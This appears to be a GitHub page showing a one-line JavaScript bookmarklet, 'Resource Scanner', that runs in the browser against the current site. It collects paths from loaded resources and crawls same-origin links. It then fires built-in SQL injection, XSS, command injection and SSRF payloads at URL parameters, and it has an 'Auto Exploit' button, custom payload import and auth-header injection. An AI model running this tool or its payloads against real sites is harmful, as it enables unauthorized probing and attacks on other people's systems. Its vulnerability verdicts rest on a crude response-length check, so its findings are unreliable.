-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathscript.js
1 lines (1 loc) · 10.8 KB
/
script.js
1
javascript:(async function(){function sleep(ms){return new Promise(r=>setTimeout(r,ms));}var defaultPayloads={sql:["' OR '1'='1","' OR 1=1 --","\" OR \"1\"=\"1"],xss:["<svg/onload=alert(1)>","<img src=x onerror=alert(1)>"],cmd:["; ls","| id","&& whoami"],ssrf:["http://127.0.0.1","http://localhost"]};var customPayloads={};var customHeaders={};var baselineResponses={};function mergePayloads(){var m={};for(var k in defaultPayloads){m[k]=defaultPayloads[k].slice();if(customPayloads[k]){m[k]=m[k].concat(customPayloads[k]);}}return m;}async function fetchWithRetry(url,retries=3,timeout=5000){for(let i=0;i<retries;i++){let controller=new AbortController();let timer=setTimeout(()=>controller.abort(),timeout);try{let response=await fetch(url,{signal:controller.signal,headers:customHeaders});clearTimeout(timer);if(response.ok){return await response.text();}else{throw new Error("HTTP error: "+response.status);}}catch(e){clearTimeout(timer);if(i===retries-1){throw e;}await sleep(timeout*(i+1));}}}function extractPaths(text){let r=/['"]((?:\/|\.\.\/|\.\/)[^'"]{1,200})['"]/g,matches=[],match;while((match=r.exec(text))!==null){if(isValidPath(match[1])){matches.push(match[1]);}}return matches;}function isValidPath(p){return (p.startsWith("/")||p.startsWith("./")||p.startsWith("../"))&&!p.includes(" ")&&/^[\x20-\x7E]+$/.test(p)&&p.length>1&&p.length<200;}async function processConcurrently(tasks,limit,onProgress){let results=[],running=0,index=0;return new Promise((resolve,reject)=>{function runNext(){if(index===tasks.length&&running===0){resolve(results);return;}while(running<limit && index<tasks.length){let currentIndex=index;let task=tasks[index++];running++;task().then(res=>{results[currentIndex]={status:"fulfilled",value:res};}).catch(err=>{results[currentIndex]={status:"rejected",reason:err};}).finally(()=>{running--;if(onProgress)onProgress();runNext();});}}runNext();});}function createOverlay(){let container=document.createElement("div");container.id="scannerOverlay";Object.assign(container.style,{position:"fixed",bottom:"0",left:"0",width:"100%",maxHeight:"50%",overflowY:"auto",backgroundColor:"white",color:"black",padding:"10px",zIndex:"9999",borderTop:"2px solid black",fontFamily:"Arial, sans-serif",boxShadow:"0px -2px 10px rgba(0,0,0,0.3)"});let header=document.createElement("div");header.style.display="flex";header.style.justifyContent="space-between";header.style.alignItems="center";let title=document.createElement("h4");title.innerText="Resource Scanner";title.style.margin="0";let btnContainer=document.createElement("div");let minBtn=document.createElement("button");minBtn.innerText="_";minBtn.style.marginRight="5px";let copyBtn=document.createElement("button");copyBtn.innerText="Copy";copyBtn.style.marginRight="5px";let vulnBtn=document.createElement("button");vulnBtn.innerText="Vuln Check";vulnBtn.style.marginRight="5px";let deepScanBtn=document.createElement("button");deepScanBtn.innerText="Deep Scan";deepScanBtn.style.marginRight="5px";let advVulnBtn=document.createElement("button");advVulnBtn.innerText="Adv Vuln Test";advVulnBtn.style.marginRight="5px";let autoExploitBtn=document.createElement("button");autoExploitBtn.innerText="Auto Exploit";autoExploitBtn.style.marginRight="5px";let importPayloadBtn=document.createElement("button");importPayloadBtn.innerText="Import Payloads";importPayloadBtn.style.marginRight="5px";let setAuthBtn=document.createElement("button");setAuthBtn.innerText="Set Auth";setAuthBtn.style.marginRight="5px";let closeBtn=document.createElement("button");closeBtn.innerText="X";btnContainer.append(minBtn,copyBtn,vulnBtn,deepScanBtn,advVulnBtn,autoExploitBtn,importPayloadBtn,setAuthBtn,closeBtn);header.append(title,btnContainer);container.appendChild(header);let progress=document.createElement("progress");progress.value=0;progress.max=100;progress.style.width="100%";progress.style.marginTop="5px";container.appendChild(progress);let content=document.createElement("div");content.id="scannerContent";content.style.marginTop="10px";container.appendChild(content);let resultSection=document.createElement("div");let resultTitle=document.createElement("h5");resultTitle.innerText="Unique Paths Found:";resultSection.appendChild(resultTitle);let resultList=document.createElement("ul");resultList.id="resultList";resultSection.appendChild(resultList);content.appendChild(resultSection);let errorSection=document.createElement("div");let errorTitle=document.createElement("h5");errorTitle.innerText="Errors:";errorSection.appendChild(errorTitle);let errorList=document.createElement("ul");errorList.id="errorList";errorSection.appendChild(errorList);content.appendChild(errorSection);document.body.appendChild(container);minBtn.onclick=()=>{if(content.style.display==="none"){content.style.display="block";progress.style.display="block";}else{content.style.display="none";progress.style.display="none";}};copyBtn.onclick=()=>{navigator.clipboard.writeText(resultList.innerText).then(()=>{alert("Copied to clipboard!");});};closeBtn.onclick=()=>{document.body.removeChild(container);};vulnBtn.onclick=()=>{vulnerabilityCheck();};deepScanBtn.onclick=()=>{deepScan();};advVulnBtn.onclick=()=>{advancedVulnTest();};autoExploitBtn.onclick=()=>{autoExploit();};importPayloadBtn.onclick=()=>{importPayloads();};setAuthBtn.onclick=()=>{setAuth();};return {container,progress,resultList,errorList,content};}async function scanResources(ui){let resources=performance.getEntriesByType("resource").map(e=>e.name);console.log("Resources found:",resources);let uniquePaths=new Set();let fetchedUrls=new Set();let tasks=[];resources.forEach(url=>{tasks.push(async ()=>{if(fetchedUrls.has(url))return;fetchedUrls.add(url);try{let text=await fetchWithRetry(url);let paths=extractPaths(text);paths.forEach(p=>uniquePaths.add(new URL(p,location.origin).href));}catch(err){let li=document.createElement("li");li.innerText="Error fetching "+url+": "+err.message;ui.errorList.appendChild(li);}});});let completed=0;let total=tasks.length;ui.progress.max=total;await processConcurrently(tasks,5,()=>{completed++;ui.progress.value=completed;});ui.resultList.innerHTML="";[...uniquePaths].forEach(path=>{let li=document.createElement("li");li.innerText=path;li.style.cursor="pointer";li.onclick=()=>window.open(path,"_blank");ui.resultList.appendChild(li);});let finalMsg=document.createElement("p");finalMsg.innerText="Scanning complete. Processed "+total+" resources. Found "+uniquePaths.size+" unique paths.";ui.content.appendChild(finalMsg);window.initialPaths=[...uniquePaths];}async function vulnerabilityCheck(){let items=document.querySelectorAll("#resultList li");let tasks=Array.from(items).map(li=>async ()=>{let url=new URL(li.innerText,location.origin).href;try{let response=await fetch(url,{method:"HEAD",headers:customHeaders});li.innerText=li.innerText+" - "+response.status;if(response.status===200){li.style.color="red";}else if(response.status===403){li.style.color="orange";}else{li.style.color="green";}}catch(e){li.innerText=li.innerText+" - Error";li.style.color="gray";}});await processConcurrently(tasks,5);alert("Vulnerability check complete.");}async function deepCrawl(url,depth,visited,ui){if(depth<=0||visited.has(url))return;visited.add(url);try{let text=await fetchWithRetry(url);let parser=new DOMParser();let doc=parser.parseFromString(text,"text/html");let links=Array.from(doc.querySelectorAll("a")).map(a=>a.getAttribute("href")).filter(h=>h);links=links.map(link=>{try{return new URL(link,url).href;}catch(e){return null;}}).filter(link=>link&&link.startsWith(location.origin));links.forEach(link=>{if(!window.globalCrawled.has(link)){window.globalCrawled.add(link);let li=document.createElement("li");li.innerText=link;li.style.cursor="pointer";li.onclick=()=>window.open(link,"_blank");ui.resultList.appendChild(li);}});for(let link of links){await deepCrawl(link,depth-1,visited,ui);} }catch(e){let li=document.createElement("li");li.innerText="Error crawling "+url+": "+e.message;li.style.color="gray";ui.errorList.appendChild(li);} }async function deepScan(){if(!window.initialPaths){alert("Run initial scan first.");return;}let visited=new Set();if(!window.globalCrawled)window.globalCrawled=new Set();for(let url of window.initialPaths){await deepCrawl(url,3,visited,ui);}alert("Deep scan complete.");}async function getBaseline(url){if(baselineResponses[url])return baselineResponses[url];try{let text=await fetchWithRetry(url);baselineResponses[url]=text.length;return text.length;}catch(e){baselineResponses[url]=0;return 0;}}async function advancedVulnTest(){let merged=mergePayloads();let items=document.querySelectorAll("#resultList li");for(let li of items){let urlStr=li.innerText.split(" - ")[0];try{let url=new URL(urlStr,location.origin);if(url.search){for(let key of Array.from(url.searchParams.keys())){let original=url.searchParams.get(key);let base=await getBaseline(url.href);for(let cat in merged){for(let payload of merged[cat]){url.searchParams.set(key,payload);let testUrl=url.href;try{let resp=await fetchWithRetry(testUrl);let diff=Math.abs(resp.length-base)/base;if(diff>0.3){li.innerText+=` | [${cat} vuln: ${payload}]`;li.style.color="red";}}catch(e){}}url.searchParams.set(key,original);}}}else{for(let cat in merged){for(let payload of merged[cat]){let testUrl=urlStr+payload;try{let resp=await fetchWithRetry(testUrl);let base=await getBaseline(urlStr);let diff=Math.abs(resp.length-base)/base;if(diff>0.3){li.innerText+=` | [${cat} vuln: ${payload}]`;li.style.color="red";}}catch(e){}}}}}catch(e){}}alert("Advanced vulnerability testing complete.");}async function autoExploit(){let items=document.querySelectorAll("#resultList li");for(let li of items){if(li.innerText.includes("vuln")){try{let urlStr=li.innerText.split(" - ")[0];let url=new URL(urlStr,location.origin);if(url.search){for(let key of Array.from(url.searchParams.keys())){let original=url.searchParams.get(key);url.searchParams.set(key,"exploited");let exploitUrl=url.href;let resp=await fetchWithRetry(exploitUrl);if(resp.length>0){li.innerText+=` | [Exploited]`;li.style.color="purple";}url.searchParams.set(key,original);}}else{let exploitUrl=urlStr+"exploited";let resp=await fetchWithRetry(exploitUrl);if(resp.length>0){li.innerText+=` | [Exploited]`;li.style.color="purple";}}}catch(e){}}}alert("Automated exploitation complete.");}async function importPayloads(){try{let inp=prompt("Enter payloads as JSON:");if(inp){let userPayload=JSON.parse(inp);for(let cat in userPayload){if(customPayloads[cat]){customPayloads[cat]=customPayloads[cat].concat(userPayload[cat]);}else{customPayloads[cat]=userPayload[cat];}}alert("Payloads imported.");}}catch(e){alert("Invalid JSON.");}}async function setAuth(){try{let inp=prompt("Enter custom headers as JSON:");if(inp){customHeaders=JSON.parse(inp);alert("Auth headers set.");}}catch(e){alert("Invalid JSON.");}};let ui=createOverlay();ui.resultList.innerHTML="<li>Scanning started...</li>";try{await scanResources(ui);}catch(err){console.error("Scanning failed:",err);}})();